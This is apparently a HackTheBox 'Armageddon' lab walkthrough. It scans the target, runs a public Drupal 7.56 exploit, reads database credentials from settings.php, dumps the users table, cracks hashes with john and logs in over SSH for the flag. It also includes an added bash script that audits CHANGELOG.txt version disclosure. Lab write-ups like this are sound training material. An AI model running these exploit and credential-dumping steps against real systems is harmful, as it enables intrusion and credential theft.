HackTheBox: Armageddon Walkthrough
Step 1:
Let’s scan for open ports with Nmap
Command: nmap -A 10.10.10.233
We see open ports here:
22/tcp-SSH port
80/tcp-HTTP port
Step 2:
Let’s check the HTTP site on port 80:
If we look at ‘CHANGELOG.txt’ on port 80, we will learn the version of Drupal.
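From the defender's side, the same disclosure can be checked locally on the web server. The script below is an added example, not part of the original walkthrough: it reads CHANGELOG.txt from a Drupal docroot and reports the version it exposes. The function names, the sample file and the minimum version 7.99 are constructed placeholders chosen by the operator.

```bash
#!/usr/bin/env bash
# Added example: local audit for the CHANGELOG.txt version disclosure.
# Docroot path and minimum version are operator-supplied assumptions.

# Print the newest version in a Drupal CHANGELOG.txt (first "Drupal X.Y," heading).
changelog_version() {
    sed -n 's/^Drupal \([0-9][0-9.]*\),.*/\1/p' "$1" | head -n 1
}

# Return 0 if version $1 is strictly lower than version $2 (uses GNU sort -V).
version_lt() {
    [ "$1" != "$2" ] &&
        [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}

# audit_docroot DOCROOT MIN_VERSION
# Prints one line per finding; returns 1 if anything was reported.
audit_docroot() {
    local file="$1/CHANGELOG.txt" min="$2" ver
    if [ ! -f "$file" ]; then
        echo "OK no CHANGELOG.txt in docroot"
        return 0
    fi
    ver=$(changelog_version "$file")
    if [ -z "$ver" ]; then
        echo "WARN CHANGELOG.txt present but no version heading parsed"
        return 1
    fi
    echo "FINDING CHANGELOG.txt discloses Drupal $ver"
    if version_lt "$ver" "$min"; then
        echo "FINDING Drupal $ver is below required minimum $min"
    fi
    return 1
}

# Demo on a constructed docroot (sample content, not taken from the target).
demo_root=$(mktemp -d)
printf '\nDrupal 7.56, 2017-06-21\n-----------------------\n- Sample entry\n' \
    > "$demo_root/CHANGELOG.txt"
audit_docroot "$demo_root" 7.99 || true   # 7.99 is a placeholder policy value
rm -rf "$demo_root"
```

Removing CHANGELOG.txt from the docroot or denying it in the web server configuration only hides the version string; the installed version still has to be kept current.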
Step 3:
Now let’s find an exploit for Drupal 7.56
Command: searchsploit Drupal 7.56
Step 4:
Let’s infiltrate the system now
Command: ruby /usr/share/exploitdb/exploits/php/webapps/44449.rb 10.10.10.233
Step 5:
Let’s look inside
Command: ls
Now let’s look at all the files
Command: find
Looking through all the files, one of them contains some information we need.
Let’s check the file
Command: cat /sites/default/settings.php
Step 6:
Let’s explore the tables in the database!
Command: mysql -u ****** -p************** -D drupal -e 'show tables;'
When we look at the whole list, we see a ‘users’ table with possible names and passwords.
Let’s check the users list!
Command: mysql -u ********* -p****************** -D drupal -e 'select * from users;'
We get 2 users and password hashes, one of which is an admin!
You can crack this password with the ‘john’ tool.
Step 7:
Now let’s connect over SSH with the information we have.
Command: ssh username@10.10.10.233
We are in.
Checking the file system, we have user.txt, our first flag!